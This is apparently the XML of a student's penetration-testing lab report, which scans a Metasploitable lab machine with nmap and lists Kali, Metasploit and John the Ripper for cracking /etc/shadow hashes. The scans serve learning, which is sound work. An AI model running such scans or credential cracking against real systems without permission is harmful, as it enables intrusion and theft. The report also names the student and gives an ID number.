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4F334" w14:textId="61B6B9AC" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NAME : </w:t>
      </w:r>
      <w:r w:rsidR="00761F1F">
        <w:t>Divakar Mandal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2C7EA" w14:textId="44A991D0" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ERP :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 66</w:t>
      </w:r>
      <w:r w:rsidR="00761F1F">
        <w:t>04682</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C346D" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="134"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>COURCE :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> B.tech CSE (cybersecurity) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83F9F7" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="195"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SEMESTER :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55192D54" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SECTION :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CY4A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ECDCFC" w14:textId="2CAA9B5B" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="355"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DATE :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761F1F">
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/5/2025 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E697D9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Project objectives </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C33AD" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">INTRODUCTION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37375781" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="327" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="145" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Network penetration testing is a proactive cybersecurity practice where ethical hackers simulate real-world cyberattacks to identify and evaluate vulnerabilities within an organization's network infrastructure. The primary objective is to uncover security weaknesses-whether in network devices, applications, or user practices-before malicious actors can exploit them </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124B9AA" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>THEORY :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3ABBD" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="145" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> typical network penetration test follows a structured methodology that includes reconnaissance, discovery, exploitation, and analysis. During reconnaissance, testers gather intelligence on network assets and potential vulnerabilities, both technical (such as open ports or outdated software) and human (like susceptibility to phishing). The discovery phase involves actively probing these weaknesses to identify exploitable entry points. In the exploitation phase, testers attempt to breach the network using techniques and tools similar to those employed by real attackers, aiming to gain unauthorized access or demonstrate the impact of a successful attack</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:color w:val="467886"/>
            <w:sz w:val="18"/>
            <w:u w:val="single" w:color="467886"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The final analysis documents findings, exploited vulnerabilities, and recommendations for remediation, providing organizations with actionable insights to strengthen their defenses </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17104A9A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="145" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Network penetration testing is the process of evaluating a system’s network security by simulating attacks from malicious outsiders and insiders. The goal is to find security loopholes before attackers do. It includes multiple phases:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AC0B9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="162" w:line="260" w:lineRule="auto"/>
        <w:ind w:right="145" w:hanging="735"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reconnaissance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gathering information about the target.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22905DB0" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="162" w:line="260" w:lineRule="auto"/>
        <w:ind w:right="145" w:hanging="735"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scanning &amp; Enumeration:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Actively probing to find open ports, services, and vulnerabilities.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766F2AB" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="162" w:line="260" w:lineRule="auto"/>
        <w:ind w:right="145" w:hanging="735"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Exploitation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gaining unauthorized access using known exploits.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637859C5" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="406" w:line="260" w:lineRule="auto"/>
        <w:ind w:right="145" w:hanging="735"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Post-Exploitation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Activities like privilege escalation or data access.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18B7A1" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="72" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="701" w:right="145" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    Remediation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Providing security measures to patch vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4965E5" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="329"/>
        <w:ind w:left="706"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D6C3D5" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="31"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>REQUIRMEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">T FOR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>PROJECT :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A237A5A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9029" w:type="dxa"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="53" w:type="dxa"/>
          <w:left w:w="105" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4517"/>
        <w:gridCol w:w="4512"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D37DE4" w14:paraId="2C0D3942" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="795"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4517" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E199C79" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="5"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kali Linux  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4512" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4794A1BA" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The attacker machine, containing preinstalled penetration testing tools.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D37DE4" w14:paraId="46D03B5B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4517" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="125A66E8" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="5"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metasploitable  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4512" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="312A8229" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A vulnerable machine to practice attacks on.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D37DE4" w14:paraId="6AF42E5E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="795"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4517" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D81F171" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="5"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">nmap  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4512" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D185EA8" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">For network scanning, port discovery, OS detection, and service version enumeration.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D37DE4" w14:paraId="043850EC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1251"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4517" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34A3B619" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="5"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metasploit Framework  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4512" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="078DB0EE" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">For exploiting known vulnerabilities in services running on the target.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C957C0" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D37DE4" w14:paraId="2F6C78CF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4517" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F851DFC" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="5"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">John the Ripper  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4512" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="30DC4BDA" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">For cracking hashed passwords obtained from /etc/shadow.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E56B50D" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F6362CE" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="290"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D26F39" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>TASKS :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01B73E" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="45"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DFC80C" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Basic Network Scan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A5E61" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       #    Nmap -v 192.168.1.100  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3B044" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507C5D39" wp14:editId="4E112142">
            <wp:extent cx="5731510" cy="427164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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4271645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DF273" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="155"/>
        <w:ind w:right="5965"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2 – Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Task 1: Scanning for hidden Ports nmap -v -p- 192.168.1.100  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB0623" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="-1"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0235BABF" wp14:editId="6249D5BA">
            <wp:extent cx="5731510" cy="429895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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4298950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385736D2" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:right="6642" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Total Hidden Ports = 7 List of hidden ports: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DEE26C" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2121, 8180, 8787, 36525, 38819, 41246, 59082 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A0EB53" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:right="5359" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 2: Service Version Detection nmap -v -sV 192.168.1.100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970C1CB" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C75F4A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="-1"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45991E15" wp14:editId="1E23F07C">
            <wp:extent cx="5731510" cy="438340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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4383405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F6BDB" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="161"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF97F75" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
